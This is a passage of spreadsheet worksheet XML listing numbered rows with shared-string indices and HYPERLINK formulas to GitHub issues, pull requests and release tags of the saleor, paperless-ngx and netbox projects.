      <c r="H367" s="5" t="s">
        <v>888</v>
      </c>
    </row>
    <row r="368" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A368">
        <v>657</v>
      </c>
      <c r="B368" t="s">
        <v>386</v>
      </c>
      <c r="C368" t="s">
        <v>387</v>
      </c>
      <c r="D368" t="s">
        <v>162</v>
      </c>
      <c r="E368" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/12536", "https://github.com/saleor/saleor/pull/12536")</f>
        <v>https://github.com/saleor/saleor/pull/12536</v>
      </c>
      <c r="F368" s="4" t="s">
        <v>890</v>
      </c>
      <c r="G368" t="s">
        <v>889</v>
      </c>
      <c r="H368" s="5" t="s">
        <v>891</v>
      </c>
    </row>
    <row r="369" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A369">
        <v>659</v>
      </c>
      <c r="B369" t="s">
        <v>82</v>
      </c>
      <c r="C369" t="s">
        <v>388</v>
      </c>
      <c r="D369" t="s">
        <v>162</v>
      </c>
      <c r="E369" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/13929", "https://github.com/saleor/saleor/pull/13929")</f>
        <v>https://github.com/saleor/saleor/pull/13929</v>
      </c>
    </row>
    <row r="370" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A370">
        <v>663</v>
      </c>
      <c r="B370" t="s">
        <v>82</v>
      </c>
      <c r="C370" t="s">
        <v>389</v>
      </c>
      <c r="D370" t="s">
        <v>162</v>
      </c>
      <c r="E370" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/15706", "https://github.com/saleor/saleor/issues/15706")</f>
        <v>https://github.com/saleor/saleor/issues/15706</v>
      </c>
    </row>
    <row r="371" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A371">
        <v>664</v>
      </c>
      <c r="B371" t="s">
        <v>11</v>
      </c>
      <c r="C371" t="s">
        <v>390</v>
      </c>
      <c r="D371" t="s">
        <v>162</v>
      </c>
      <c r="E371" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/16020", "https://github.com/saleor/saleor/issues/16020")</f>
        <v>https://github.com/saleor/saleor/issues/16020</v>
      </c>
    </row>
    <row r="372" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A372">
        <v>665</v>
      </c>
      <c r="B372" t="s">
        <v>65</v>
      </c>
      <c r="C372" t="s">
        <v>391</v>
      </c>
      <c r="D372" t="s">
        <v>162</v>
      </c>
      <c r="E372" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/16020", "https://github.com/saleor/saleor/issues/16020")</f>
        <v>https://github.com/saleor/saleor/issues/16020</v>
      </c>
    </row>
    <row r="373" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A373">
        <v>667</v>
      </c>
      <c r="B373" t="s">
        <v>42</v>
      </c>
      <c r="C373" t="s">
        <v>392</v>
      </c>
      <c r="D373" t="s">
        <v>162</v>
      </c>
      <c r="E373" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/16219", "https://github.com/saleor/saleor/pull/16219")</f>
        <v>https://github.com/saleor/saleor/pull/16219</v>
      </c>
    </row>
    <row r="374" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A374">
        <v>669</v>
      </c>
      <c r="B374" t="s">
        <v>42</v>
      </c>
      <c r="C374" t="s">
        <v>393</v>
      </c>
      <c r="D374" t="s">
        <v>162</v>
      </c>
      <c r="E374" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/16261", "https://github.com/saleor/saleor/pull/16261")</f>
        <v>https://github.com/saleor/saleor/pull/16261</v>
      </c>
    </row>
    <row r="375" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A375">
        <v>680</v>
      </c>
      <c r="B375" t="s">
        <v>42</v>
      </c>
      <c r="C375" t="s">
        <v>394</v>
      </c>
      <c r="D375" t="s">
        <v>162</v>
      </c>
      <c r="E375" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/16936", "https://github.com/saleor/saleor/pull/16936")</f>
        <v>https://github.com/saleor/saleor/pull/16936</v>
      </c>
    </row>
    <row r="376" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A376">
        <v>688</v>
      </c>
      <c r="B376" t="s">
        <v>11</v>
      </c>
      <c r="C376" t="s">
        <v>395</v>
      </c>
      <c r="D376" t="s">
        <v>162</v>
      </c>
      <c r="E376" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/17318", "https://github.com/saleor/saleor/pull/17318")</f>
        <v>https://github.com/saleor/saleor/pull/17318</v>
      </c>
    </row>
    <row r="377" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A377">
        <v>689</v>
      </c>
      <c r="B377" t="s">
        <v>11</v>
      </c>
      <c r="C377" t="s">
        <v>396</v>
      </c>
      <c r="D377" t="s">
        <v>162</v>
      </c>
      <c r="E377" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/17322", "https://github.com/saleor/saleor/pull/17322")</f>
        <v>https://github.com/saleor/saleor/pull/17322</v>
      </c>
    </row>
    <row r="378" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A378">
        <v>690</v>
      </c>
      <c r="B378" t="s">
        <v>253</v>
      </c>
      <c r="C378" t="s">
        <v>397</v>
      </c>
      <c r="D378" t="s">
        <v>162</v>
      </c>
      <c r="E378" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/17589", "https://github.com/saleor/saleor/pull/17589")</f>
        <v>https://github.com/saleor/saleor/pull/17589</v>
      </c>
    </row>
    <row r="379" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A379">
        <v>691</v>
      </c>
      <c r="B379" t="s">
        <v>253</v>
      </c>
      <c r="C379" t="s">
        <v>398</v>
      </c>
      <c r="D379" t="s">
        <v>162</v>
      </c>
      <c r="E379" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/17610", "https://github.com/saleor/saleor/pull/17610")</f>
        <v>https://github.com/saleor/saleor/pull/17610</v>
      </c>
    </row>
    <row r="380" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A380">
        <v>694</v>
      </c>
      <c r="B380" t="s">
        <v>253</v>
      </c>
      <c r="C380" t="s">
        <v>399</v>
      </c>
      <c r="D380" t="s">
        <v>162</v>
      </c>
      <c r="E380" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/17611", "https://github.com/saleor/saleor/pull/17611")</f>
        <v>https://github.com/saleor/saleor/pull/17611</v>
      </c>
    </row>
    <row r="381" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A381">
        <v>697</v>
      </c>
      <c r="B381" t="s">
        <v>253</v>
      </c>
      <c r="C381" t="s">
        <v>400</v>
      </c>
      <c r="D381" t="s">
        <v>162</v>
      </c>
      <c r="E381" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/17666", "https://github.com/saleor/saleor/pull/17666")</f>
        <v>https://github.com/saleor/saleor/pull/17666</v>
      </c>
    </row>
    <row r="382" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A382">
        <v>698</v>
      </c>
      <c r="B382" t="s">
        <v>253</v>
      </c>
      <c r="C382" t="s">
        <v>401</v>
      </c>
      <c r="D382" t="s">
        <v>402</v>
      </c>
      <c r="E382" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/releases/tag/3.20.83", "https://github.com/saleor/saleor/releases/tag/3.20.83")</f>
        <v>https://github.com/saleor/saleor/releases/tag/3.20.83</v>
      </c>
    </row>
    <row r="383" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A383">
        <v>699</v>
      </c>
      <c r="B383" t="s">
        <v>11</v>
      </c>
      <c r="C383" t="s">
        <v>403</v>
      </c>
      <c r="D383" t="s">
        <v>402</v>
      </c>
      <c r="E383" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/releases/tag/3.20.69", "https://github.com/saleor/saleor/releases/tag/3.20.69")</f>
        <v>https://github.com/saleor/saleor/releases/tag/3.20.69</v>
      </c>
    </row>
    <row r="384" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A384">
        <v>701</v>
      </c>
      <c r="B384" t="s">
        <v>42</v>
      </c>
      <c r="C384" t="s">
        <v>404</v>
      </c>
      <c r="D384" t="s">
        <v>402</v>
      </c>
      <c r="E384" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/releases/tag/3.20.0", "https://github.com/saleor/saleor/releases/tag/3.20.0")</f>
        <v>https://github.com/saleor/saleor/releases/tag/3.20.0</v>
      </c>
    </row>
    <row r="385" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A385">
        <v>702</v>
      </c>
      <c r="B385" t="s">
        <v>42</v>
      </c>
      <c r="C385" t="s">
        <v>405</v>
      </c>
      <c r="D385" t="s">
        <v>402</v>
      </c>
      <c r="E385" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/releases/tag/3.19.59", "https://github.com/saleor/saleor/releases/tag/3.19.59")</f>
        <v>https://github.com/saleor/saleor/releases/tag/3.19.59</v>
      </c>
    </row>
    <row r="386" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A386">
        <v>705</v>
      </c>
      <c r="B386" t="s">
        <v>11</v>
      </c>
      <c r="C386" t="s">
        <v>406</v>
      </c>
      <c r="D386" t="s">
        <v>402</v>
      </c>
      <c r="E386" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/releases/tag/3.12.0", "https://github.com/saleor/saleor/releases/tag/3.12.0")</f>
        <v>https://github.com/saleor/saleor/releases/tag/3.12.0</v>
      </c>
    </row>
    <row r="387" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A387">
        <v>708</v>
      </c>
      <c r="B387" t="s">
        <v>378</v>
      </c>
      <c r="C387" t="s">
        <v>407</v>
      </c>
      <c r="D387" t="s">
        <v>402</v>
      </c>
      <c r="E387" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/releases/tag/3.0.0-b.1", "https://github.com/saleor/saleor/releases/tag/3.0.0-b.1")</f>
        <v>https://github.com/saleor/saleor/releases/tag/3.0.0-b.1</v>
      </c>
    </row>
    <row r="388" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A388">
        <v>711</v>
      </c>
      <c r="B388" t="s">
        <v>17</v>
      </c>
      <c r="C388" t="s">
        <v>408</v>
      </c>
      <c r="D388" t="s">
        <v>10</v>
      </c>
      <c r="E388" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/2545", "https://github.com/paperless-ngx/paperless-ngx/issues/2545")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/2545</v>
      </c>
    </row>
    <row r="389" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A389">
        <v>713</v>
      </c>
      <c r="B389" t="s">
        <v>8</v>
      </c>
      <c r="C389" t="s">
        <v>409</v>
      </c>
      <c r="D389" t="s">
        <v>10</v>
      </c>
      <c r="E389" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/pull/2922", "https://github.com/paperless-ngx/paperless-ngx/pull/2922")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/pull/2922</v>
      </c>
    </row>
    <row r="390" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A390">
        <v>717</v>
      </c>
      <c r="B390" t="s">
        <v>11</v>
      </c>
      <c r="C390" t="s">
        <v>410</v>
      </c>
      <c r="D390" t="s">
        <v>10</v>
      </c>
      <c r="E390" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/6354", "https://github.com/paperless-ngx/paperless-ngx/issues/6354")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/6354</v>
      </c>
    </row>
    <row r="391" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A391">
        <v>718</v>
      </c>
      <c r="B391" t="s">
        <v>65</v>
      </c>
      <c r="C391" t="s">
        <v>410</v>
      </c>
      <c r="D391" t="s">
        <v>10</v>
      </c>
      <c r="E391" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/6354", "https://github.com/paperless-ngx/paperless-ngx/issues/6354")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/6354</v>
      </c>
    </row>
    <row r="392" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A392">
        <v>719</v>
      </c>
      <c r="B392" t="s">
        <v>11</v>
      </c>
      <c r="C392" t="s">
        <v>411</v>
      </c>
      <c r="D392" t="s">
        <v>10</v>
      </c>
      <c r="E392" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/6779", "https://github.com/paperless-ngx/paperless-ngx/issues/6779")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/6779</v>
      </c>
    </row>
    <row r="393" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A393">
        <v>720</v>
      </c>
      <c r="B393" t="s">
        <v>65</v>
      </c>
      <c r="C393" t="s">
        <v>411</v>
      </c>
      <c r="D393" t="s">
        <v>10</v>
      </c>
      <c r="E393" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/6779", "https://github.com/paperless-ngx/paperless-ngx/issues/6779")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/6779</v>
      </c>
    </row>
    <row r="394" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A394">
        <v>721</v>
      </c>
      <c r="B394" t="s">
        <v>8</v>
      </c>
      <c r="C394" t="s">
        <v>412</v>
      </c>
      <c r="D394" t="s">
        <v>10</v>
      </c>
      <c r="E394" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/pull/6935", "https://github.com/paperless-ngx/paperless-ngx/pull/6935")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/pull/6935</v>
      </c>
    </row>
    <row r="395" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A395">
        <v>722</v>
      </c>
      <c r="B395" t="s">
        <v>11</v>
      </c>
      <c r="C395" t="s">
        <v>413</v>
      </c>
      <c r="D395" t="s">
        <v>10</v>
      </c>
      <c r="E395" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/pull/7689", "https://github.com/paperless-ngx/paperless-ngx/pull/7689")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/pull/7689</v>
      </c>
    </row>
    <row r="396" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A396">
        <v>724</v>
      </c>
      <c r="B396" t="s">
        <v>11</v>
      </c>
      <c r="C396" t="s">
        <v>414</v>
      </c>
      <c r="D396" t="s">
        <v>10</v>
      </c>
      <c r="E396" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/8593", "https://github.com/paperless-ngx/paperless-ngx/issues/8593")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/8593</v>
      </c>
    </row>
    <row r="397" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A397">
        <v>726</v>
      </c>
      <c r="B397" t="s">
        <v>65</v>
      </c>
      <c r="C397" t="s">
        <v>414</v>
      </c>
      <c r="D397" t="s">
        <v>10</v>
      </c>
      <c r="E397" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/8593", "https://github.com/paperless-ngx/paperless-ngx/issues/8593")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/8593</v>
      </c>
    </row>
    <row r="398" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A398">
        <v>730</v>
      </c>
      <c r="B398" t="s">
        <v>11</v>
      </c>
      <c r="C398" t="s">
        <v>415</v>
      </c>
      <c r="D398" t="s">
        <v>10</v>
      </c>
      <c r="E398" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/9120", "https://github.com/paperless-ngx/paperless-ngx/issues/9120")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/9120</v>
      </c>
    </row>
    <row r="399" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A399">
        <v>731</v>
      </c>
      <c r="B399" t="s">
        <v>65</v>
      </c>
      <c r="C399" t="s">
        <v>415</v>
      </c>
      <c r="D399" t="s">
        <v>10</v>
      </c>
      <c r="E399" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/9120", "https://github.com/paperless-ngx/paperless-ngx/issues/9120")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/9120</v>
      </c>
    </row>
    <row r="400" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A400">
        <v>734</v>
      </c>
      <c r="B400" t="s">
        <v>29</v>
      </c>
      <c r="C400" t="s">
        <v>416</v>
      </c>
      <c r="D400" t="s">
        <v>10</v>
      </c>
      <c r="E400" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/10371", "https://github.com/paperless-ngx/paperless-ngx/issues/10371")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/10371</v>
      </c>
    </row>
    <row r="401" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A401">
        <v>735</v>
      </c>
      <c r="B401" t="s">
        <v>22</v>
      </c>
      <c r="C401" t="s">
        <v>417</v>
      </c>
      <c r="D401" t="s">
        <v>10</v>
      </c>
      <c r="E401" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/346", "https://github.com/saleor/saleor/issues/346")</f>
        <v>https://github.com/saleor/saleor/issues/346</v>
      </c>
    </row>
    <row r="402" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A402">
        <v>737</v>
      </c>
      <c r="B402" t="s">
        <v>22</v>
      </c>
      <c r="C402" t="s">
        <v>418</v>
      </c>
      <c r="D402" t="s">
        <v>10</v>
      </c>
      <c r="E402" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/529", "https://github.com/saleor/saleor/issues/529")</f>
        <v>https://github.com/saleor/saleor/issues/529</v>
      </c>
    </row>
    <row r="403" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A403">
        <v>738</v>
      </c>
      <c r="B403" t="s">
        <v>419</v>
      </c>
      <c r="C403" t="s">
        <v>420</v>
      </c>
      <c r="D403" t="s">
        <v>10</v>
      </c>
      <c r="E403" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/529", "https://github.com/saleor/saleor/issues/529")</f>
        <v>https://github.com/saleor/saleor/issues/529</v>
      </c>
    </row>
    <row r="404" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A404">
        <v>739</v>
      </c>
      <c r="B404" t="s">
        <v>421</v>
      </c>
      <c r="C404" t="s">
        <v>422</v>
      </c>
      <c r="D404" t="s">
        <v>10</v>
      </c>
      <c r="E404" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/529", "https://github.com/saleor/saleor/issues/529")</f>
        <v>https://github.com/saleor/saleor/issues/529</v>
      </c>
    </row>
    <row r="405" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A405">
        <v>740</v>
      </c>
      <c r="B405" t="s">
        <v>13</v>
      </c>
      <c r="C405" t="s">
        <v>423</v>
      </c>
      <c r="D405" t="s">
        <v>10</v>
      </c>
      <c r="E405" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/529", "https://github.com/saleor/saleor/issues/529")</f>
        <v>https://github.com/saleor/saleor/issues/529</v>
      </c>
    </row>
    <row r="406" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A406">
        <v>742</v>
      </c>
      <c r="B406" t="s">
        <v>424</v>
      </c>
      <c r="C406" t="s">
        <v>425</v>
      </c>
      <c r="D406" t="s">
        <v>10</v>
      </c>
      <c r="E406" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/529", "https://github.com/saleor/saleor/issues/529")</f>
        <v>https://github.com/saleor/saleor/issues/529</v>
      </c>
    </row>
    <row r="407" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A407">
        <v>751</v>
      </c>
      <c r="B407" t="s">
        <v>31</v>
      </c>
      <c r="C407" t="s">
        <v>426</v>
      </c>
      <c r="D407" t="s">
        <v>10</v>
      </c>
      <c r="E407" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/1848", "https://github.com/saleor/saleor/issues/1848")</f>
        <v>https://github.com/saleor/saleor/issues/1848</v>
      </c>
    </row>
    <row r="408" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A408">
        <v>752</v>
      </c>
      <c r="B408" t="s">
        <v>427</v>
      </c>
      <c r="C408" t="s">
        <v>428</v>
      </c>
      <c r="D408" t="s">
        <v>10</v>
      </c>
      <c r="E408" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/1848", "https://github.com/saleor/saleor/issues/1848")</f>
        <v>https://github.com/saleor/saleor/issues/1848</v>
      </c>
    </row>
    <row r="409" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A409">
        <v>754</v>
      </c>
      <c r="B409" t="s">
        <v>31</v>
      </c>
      <c r="C409" t="s">
        <v>429</v>
      </c>
      <c r="D409" t="s">
        <v>10</v>
      </c>
      <c r="E409" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/2217", "https://github.com/saleor/saleor/issues/2217")</f>
        <v>https://github.com/saleor/saleor/issues/2217</v>
      </c>
    </row>
    <row r="410" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A410">
        <v>756</v>
      </c>
      <c r="B410" t="s">
        <v>17</v>
      </c>
      <c r="C410" t="s">
        <v>430</v>
      </c>
      <c r="D410" t="s">
        <v>10</v>
      </c>
      <c r="E410" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/2612", "https://github.com/saleor/saleor/issues/2612")</f>
        <v>https://github.com/saleor/saleor/issues/2612</v>
      </c>
    </row>
    <row r="411" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A411">
        <v>765</v>
      </c>
      <c r="B411" t="s">
        <v>431</v>
      </c>
      <c r="C411" t="s">
        <v>432</v>
      </c>
      <c r="D411" t="s">
        <v>10</v>
      </c>
      <c r="E411" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/9764", "https://github.com/saleor/saleor/issues/9764")</f>
        <v>https://github.com/saleor/saleor/issues/9764</v>
      </c>
    </row>
    <row r="412" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A412">
        <v>775</v>
      </c>
      <c r="B412" t="s">
        <v>8</v>
      </c>
      <c r="C412" t="s">
        <v>433</v>
      </c>
      <c r="D412" t="s">
        <v>10</v>
      </c>
      <c r="E412" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/14029", "https://github.com/saleor/saleor/issues/14029")</f>
        <v>https://github.com/saleor/saleor/issues/14029</v>
      </c>
    </row>
    <row r="413" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A413">
        <v>779</v>
      </c>
      <c r="B413" t="s">
        <v>79</v>
      </c>
      <c r="C413" t="s">
        <v>434</v>
      </c>
      <c r="D413" t="s">
        <v>10</v>
      </c>
      <c r="E413" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/14029", "https://github.com/saleor/saleor/issues/14029")</f>
        <v>https://github.com/saleor/saleor/issues/14029</v>
      </c>
    </row>
    <row r="414" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A414">
        <v>782</v>
      </c>
      <c r="B414" t="s">
        <v>42</v>
      </c>
      <c r="C414" t="s">
        <v>435</v>
      </c>
      <c r="D414" t="s">
        <v>10</v>
      </c>
      <c r="E414" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/16287", "https://github.com/saleor/saleor/pull/16287")</f>
        <v>https://github.com/saleor/saleor/pull/16287</v>
      </c>
    </row>
    <row r="415" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A415">
        <v>784</v>
      </c>
      <c r="B415" t="s">
        <v>11</v>
      </c>
      <c r="C415" t="s">
        <v>436</v>
      </c>
      <c r="D415" t="s">
        <v>10</v>
      </c>
      <c r="E415" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/17120", "https://github.com/saleor/saleor/issues/17120")</f>
        <v>https://github.com/saleor/saleor/issues/17120</v>
      </c>
    </row>
    <row r="416" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A416">
        <v>785</v>
      </c>
      <c r="B416" t="s">
        <v>11</v>
      </c>
      <c r="C416" t="s">
        <v>437</v>
      </c>
      <c r="D416" t="s">
        <v>10</v>
      </c>
      <c r="E416" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/68", "https://github.com/netbox-community/netbox/issues/68")</f>
        <v>https://github.com/netbox-community/netbox/issues/68</v>
      </c>
    </row>
    <row r="417" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A417">
        <v>786</v>
      </c>
      <c r="B417" t="s">
        <v>65</v>
      </c>
      <c r="C417" t="s">
        <v>438</v>
      </c>
      <c r="D417" t="s">
        <v>10</v>
      </c>
      <c r="E417" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/68", "https://github.com/netbox-community/netbox/issues/68")</f>
        <v>https://github.com/netbox-community/netbox/issues/68</v>
      </c>
    </row>
    <row r="418" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A418">
        <v>791</v>
      </c>
      <c r="B418" t="s">
        <v>17</v>
      </c>
      <c r="C418" t="s">
        <v>439</v>
      </c>
      <c r="D418" t="s">
        <v>10</v>
      </c>
      <c r="E418" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/1326", "https://github.com/netbox-community/netbox/issues/1326")</f>
        <v>https://github.com/netbox-community/netbox/issues/1326</v>
      </c>
    </row>
    <row r="419" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A419">
        <v>792</v>
      </c>
      <c r="B419" t="s">
        <v>172</v>
      </c>
      <c r="C419" t="s">
        <v>440</v>
      </c>
      <c r="D419" t="s">
        <v>10</v>
      </c>
      <c r="E419" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/2665", "https://github.com/netbox-community/netbox/issues/2665")</f>
        <v>https://github.com/netbox-community/netbox/issues/2665</v>
      </c>
    </row>
    <row r="420" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A420">
        <v>794</v>
      </c>
      <c r="B420" t="s">
        <v>192</v>
      </c>
      <c r="C420" t="s">
        <v>441</v>
      </c>
      <c r="D420" t="s">
        <v>10</v>
      </c>
      <c r="E420" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/2977", "https://github.com/netbox-community/netbox/issues/2977")</f>
        <v>https://github.com/netbox-community/netbox/issues/2977</v>
      </c>
    </row>
    <row r="421" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A421">
        <v>796</v>
      </c>
      <c r="B421" t="s">
        <v>42</v>
      </c>
      <c r="C421" t="s">
        <v>442</v>
      </c>
      <c r="D421" t="s">
        <v>10</v>
      </c>
      <c r="E421" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/3445", "https://github.com/netbox-community/netbox/issues/3445")</f>
        <v>https://github.com/netbox-community/netbox/issues/3445</v>
      </c>
    </row>
    <row r="422" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A422">
        <v>797</v>
      </c>
      <c r="B422" t="s">
        <v>11</v>
      </c>
      <c r="C422" t="s">
        <v>443</v>
      </c>
      <c r="D422" t="s">
        <v>10</v>
      </c>
      <c r="E422" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/3519", "https://github.com/netbox-community/netbox/issues/3519")</f>
        <v>https://github.com/netbox-community/netbox/issues/3519</v>
      </c>
    </row>
    <row r="423" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A423">
        <v>798</v>
      </c>
      <c r="B423" t="s">
        <v>65</v>
      </c>
      <c r="C423" t="s">
        <v>443</v>
      </c>
      <c r="D423" t="s">
        <v>10</v>
      </c>
      <c r="E423" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/3519", "https://github.com/netbox-community/netbox/issues/3519")</f>
        <v>https://github.com/netbox-community/netbox/issues/3519</v>
      </c>
    </row>
    <row r="424" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A424">
        <v>801</v>
      </c>
      <c r="B424" t="s">
        <v>177</v>
      </c>
      <c r="C424" t="s">
        <v>444</v>
      </c>
      <c r="D424" t="s">
        <v>10</v>
      </c>
      <c r="E424" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/4717", "https://github.com/netbox-community/netbox/issues/4717")</f>
        <v>https://github.com/netbox-community/netbox/issues/4717</v>
      </c>
    </row>
    <row r="425" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A425">
        <v>802</v>
      </c>
      <c r="B425" t="s">
        <v>42</v>
      </c>
      <c r="C425" t="s">
        <v>445</v>
      </c>
      <c r="D425" t="s">
        <v>10</v>
      </c>
      <c r="E425" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/5023", "https://github.com/netbox-community/netbox/issues/5023")</f>
        <v>https://github.com/netbox-community/netbox/issues/5023</v>
      </c>
    </row>
    <row r="426" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A426">
        <v>805</v>
      </c>
      <c r="B426" t="s">
        <v>11</v>
      </c>
      <c r="C426" t="s">
        <v>446</v>
      </c>
      <c r="D426" t="s">
        <v>10</v>
      </c>
      <c r="E426" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/5468", "https://github.com/netbox-community/netbox/issues/5468")</f>
        <v>https://github.com/netbox-community/netbox/issues/5468</v>
      </c>
    </row>
    <row r="427" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A427">
        <v>806</v>
      </c>
      <c r="B427" t="s">
        <v>65</v>
      </c>
      <c r="C427" t="s">
        <v>446</v>
      </c>
      <c r="D427" t="s">
        <v>10</v>
      </c>
      <c r="E427" t="str">
